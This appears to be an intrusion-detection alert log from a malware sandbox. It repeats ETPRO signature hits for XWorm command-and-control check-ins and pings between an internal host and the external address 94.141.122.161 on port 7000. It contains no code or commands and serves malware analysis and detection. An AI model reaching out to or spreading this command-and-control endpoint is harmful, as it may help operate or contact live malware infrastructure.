                                                                                            2025-01-07T18:04:16.980517+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:16.980517+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:17.118048+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:17.118048+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:17.220216+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:17.220216+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:17.336988+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:17.336988+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:17.453708+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:17.453708+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:17.563782+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:17.563782+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:17.672514+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:17.672514+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:17.791670+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:17.791670+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:17.928371+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:17.928371+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:18.032637+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:18.032637+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:18.141140+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:18.141140+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:18.250525+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:18.250525+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:18.365299+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:18.365299+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:18.469268+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:18.469268+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:18.582591+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:18.582591+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:18.687952+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:18.687952+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:18.797451+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:18.797451+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:18.906757+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:18.906757+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:19.016127+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:19.016127+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:19.126093+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:19.126093+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:19.234940+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:19.234940+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:19.344671+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:19.344671+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:19.453784+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:19.453784+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:19.562958+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:19.562958+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:19.698955+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:19.698955+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:19.815770+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:19.815770+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:19.926937+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:19.926937+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:20.031731+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:20.031731+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:20.141127+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:20.141127+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:20.250411+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:20.250411+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:20.359776+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:20.359776+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:20.469224+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:20.469224+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:20.592686+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:20.592686+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:20.703557+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:20.703557+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:20.812963+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:20.812963+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:20.897358+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.141.122.1617000192.168.2.749976TCP
                                                                                            2025-01-07T18:04:20.930041+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74997694.141.122.1617000TCP
                                                                                            2025-01-07T18:04:20.930463+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:20.930463+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:21.031710+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:21.031710+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:21.141044+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:21.141044+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:21.260217+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:21.260217+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:21.375936+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:21.375936+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:21.487292+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:21.487292+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:21.594783+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:21.594783+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:21.704004+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:21.704004+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:21.813164+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:21.813164+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:21.938035+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:21.938035+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:22.050278+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:22.050278+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:22.156932+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:22.156932+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:22.282853+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:22.282853+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:22.391202+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:22.391202+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:22.500528+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:22.500528+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:22.611632+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:22.611632+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:22.719160+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:22.719160+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:22.828475+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:22.828475+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:22.938113+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:22.938113+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:23.047456+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:23.047456+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:23.156855+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:23.156855+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:23.266456+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:23.266456+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:23.375485+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:23.375485+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:23.492711+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:23.492711+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:23.610512+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:23.610512+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:23.722000+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:23.722000+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:23.828875+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:23.828875+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:23.941020+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:23.941020+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:23.952124+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.141.122.1617000192.168.2.749976TCP
                                                                                            2025-01-07T18:04:23.952124+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2194.141.122.1617000192.168.2.749976TCP
                                                                                            2025-01-07T18:04:24.054932+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:24.054932+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:24.166116+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:24.166116+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:24.281666+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:24.281666+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:24.414600+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:24.414600+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:24.516442+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:24.516442+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:24.625445+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:24.625445+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:24.734901+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:24.734901+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:24.845230+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:24.845230+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:24.981872+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:24.981872+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:25.103499+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:25.103499+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:25.221709+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:25.221709+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:25.352947+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:25.352947+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:25.473002+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:25.473002+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:25.579339+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:25.579339+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:25.689728+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:25.689728+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:25.808761+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:25.808761+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:25.923159+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:25.923159+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:26.071332+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:26.071332+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:26.174677+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:26.174677+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:26.296737+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:26.296737+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:26.423123+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:26.423123+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:26.533252+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:26.533252+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:26.641115+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:26.641115+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:26.750549+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:26.750549+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:26.859856+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
